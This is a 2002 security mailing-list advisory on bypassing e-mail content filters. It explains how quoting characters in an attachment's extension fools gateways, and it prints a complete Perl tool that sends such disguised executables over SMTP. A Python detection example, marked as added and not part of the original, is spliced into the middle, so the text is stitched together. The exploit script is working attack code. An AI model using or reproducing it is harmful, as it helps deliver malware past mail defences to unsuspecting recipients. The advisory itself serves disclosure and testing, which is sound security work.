[EXPL] Bypassing Content Filtering Software (Exploit)

From: support@securiteam.com
Date: 02/21/02



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Bypassing Content Filtering Software (Exploit)
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article, Bypassing Content Filtering Software
(<http://www.securiteam.com/securitynews/5DP0I206AY.html>), flaws in several
e-mail filtering products allow encoded e-mails that contain malicious
attachments to bypass the filtering engines. The following is exploit code
that administrators can use to test their own systems for the vulnerabilities
mentioned there.

DETAILS

There are many ways to get past mail filtering systems, because most of them
do not emulate the exact behavior of the e-mail clients, especially when
several different clients are in use. One of the most effective methods
against Outlook/Outlook Express is simply to name the file

eviltrojan."e"x"e

Outlook/OE strips the quotes out of the filename before the file is executed,
so the gateway matches against the extension as written in the MIME header
while the client ends up saving and running a .exe.

Of course, most filtering systems will also scan the file contents, recognize
it as an executable (PE) and disallow it (the same goes for VBS/JS files etc.;
they usually look for very common VB or JS code), but it is pretty obvious
that they do not recognize all executable content (.bat files, for example),
or encoded data, as mentioned in the advisory.

One other thing: Outlook/OE will sometimes assign a name to an attachment that
has none, depending on the content-type, and this applies mostly to
non-dangerous types. For example, a WAV attachment that has no filename in the
MIME headers but carries Content-Type: audio/x-wav will be named
ATT00xxx.wav. The same works with .hta files if you leave them unnamed and
give them Content-Type: application/hta.
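To turn the two observations above into a gateway-side check, here is an added Python example (not part of the advisory and not related to attqt.pl) that parses a constructed MIME message with the standard library email module and compares a naive extension match against one that first strips the characters Outlook would remove and assigns an extension to unnamed parts from their Content-Type. The illegal-character set, block list and type-to-extension map are assumptions for the example.

```python
from email import message_from_string

# Characters Windows forbids in filenames; Outlook/OE silently drops them when
# saving an attachment, so a gateway must drop them too before it looks at the
# extension. Sets and the type map are constructed here and not exhaustive.
ILLEGAL_CHARS = set('"<>|:*?\\/')
BLOCKED_EXT = {"exe", "vbs", "js", "bat", "hta", "scr", "pif", "com"}
TYPE_TO_EXT = {"application/hta": "hta", "application/x-msdownload": "exe"}

# Constructed sample: one attachment named with the quote trick from the
# advisory, one unnamed application/hta part (client would save ATT00xxx.hta).
SAMPLE_MESSAGE = """\
Content-Type: multipart/mixed; boundary="B1"

--B1
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename="eviltrojan."e"x"e"
Content-Transfer-Encoding: base64

TVqQAA==
--B1
Content-Type: application/hta
Content-Transfer-Encoding: base64

PGh0bWw+
--B1--
"""

def naive_extension(name):
    """What a gateway matching the raw header sees: the text after the last dot."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""

def client_extension(part):
    """Extension the mail client will actually use when it saves this part."""
    name = part.get_filename()
    if not name:  # unnamed part: the client derives an extension from Content-Type
        return TYPE_TO_EXT.get(part.get_content_type(), "")
    return naive_extension("".join(c for c in name if c not in ILLEGAL_CHARS))

def scan(raw, normalize=True):
    """Return (filename, content_type, extension) for every blocked attachment."""
    hits = []
    for part in message_from_string(raw).walk():
        if part.is_multipart():
            continue
        ext = client_extension(part) if normalize else naive_extension(part.get_filename() or "")
        if ext in BLOCKED_EXT:
            hits.append((part.get_filename(), part.get_content_type(), ext))
    return hits
```

Run against the sample, the naive scan returns nothing while the normalized scan flags both parts, which is exactly the gap the advisory describes.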

Exploit:
#!/usr/bin/perl

# attqt.pl 0.1 by Aidan O'Kelly July 2001
# Send banned attachments through SMTP gateways. This works because MS Outlook
# removes illegal characters in filenames, so when you put an illegal char
# (such as ") in the extension the gateway will not recognize it as a
# dangerous attachment, but when the user on the other end opens it the
# illegal char will be removed.
#
# Feedback welcome. aidan.ok@oceanfree.net
#
# This is known to work on MailMarshall and TrendMicro Scanmail. Others have
# not been tested but most are probably vulnerable. If it works on any others,
# please mail me and let me know.
# This only puts in one quote after the dot (eg virus."vbs or virus."exe).
# Some gateways might still pick up on the vbs. You can put in more or
# different characters like virus.%v"b********s if you feel like it.
# $filename =~ s/\./\.\"/g; is the line that changes it.

use Getopt::Std;
use MIME::Base64 qw(encode_base64);
use IO::Socket::INET;

getopt('atfhsb');

if (!$opt_a || !$opt_f || !$opt_t || !$opt_h)
{
        print "Usage: attqt.pl <-a attachment> <-t to> <-f from> <-h smtphost> [-s subject] [-b text]\n";
        exit;
}

# Base64-encode the attachment; reading in multiples of 57 bytes keeps each
# encoded chunk aligned on whole 76-character lines.
open(FILE, $opt_a) or die "$!";
binmode FILE;
while (read(FILE, $buf, 60*57)) {
    $attachment = $attachment . encode_base64($buf);
}
close(FILE);

# Insert a quote after every dot: virus.exe becomes virus."exe
$filename = $opt_a;
$filename =~ s/\./\.\"/g;
print "$filename\n";

# Hand-rolled SMTP session; each server reply is checked for its status code
$sock = IO::Socket::INET->new(PeerAddr => "$opt_h", PeerPort => '25', Proto => 'tcp')
    or die "Cannot connect to $opt_h: $@";
unless (<$sock> =~ "220") { die "Not a SMTP Server?" }
print $sock "HELO you\r\n";
unless (<$sock> =~ "250") { die "HELO failed" }
print $sock "MAIL FROM:<>\r\n";
unless (<$sock> =~ "250") { die "MAIL FROM failed" }
print $sock "RCPT TO:<$opt_t>\r\n";
unless (<$sock> =~ "250") { die "RCPT TO failed" }
print $sock "DATA\r\n";
unless (<$sock> =~ "354") { die "DATA failed" }

# Message headers, then a multipart/related body: an alternative text/html
# part carrying -b text, followed by the attachment with the mangled filename
print $sock "From: $opt_f\n";
print $sock "To: $opt_t\n";
print $sock "Subject: $opt_s\n";

print $sock "MIME-Version: 1.0
Content-Type: multipart/related;
        type=\"multipart/alternative\";
        boundary=\"NextPart19\"

This is a multi-part message in MIME format.

--NextPart19
Content-Type: multipart/alternative;
        boundary=\"NextPart20\"

--NextPart20
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

--NextPart20
Content-Type: text/html;
        charset=\"iso-8859-1\"
Content-Transfer-Encoding: quoted-printable

";
print $sock "$opt_b\n";
print $sock "--NextPart20--

--NextPart19
Content-Type: application/x-msdownload
Content-Disposition: attachment;filename=\"$filename\"
Content-Transfer-Encoding: base64\r\n\n";
print $sock $attachment;

# Closing boundary and end-of-data marker, then read the server's final reply
print $sock "\r\n--NextPart19--\n.\n";
print "Finished sending data\n";
$a = <$sock>;
print "$a\n";
close($sock);

ADDITIONAL INFORMATION

The information has been provided by <mailto:aidanokelly@oceanfree.net>
Aidan O'Kelly.
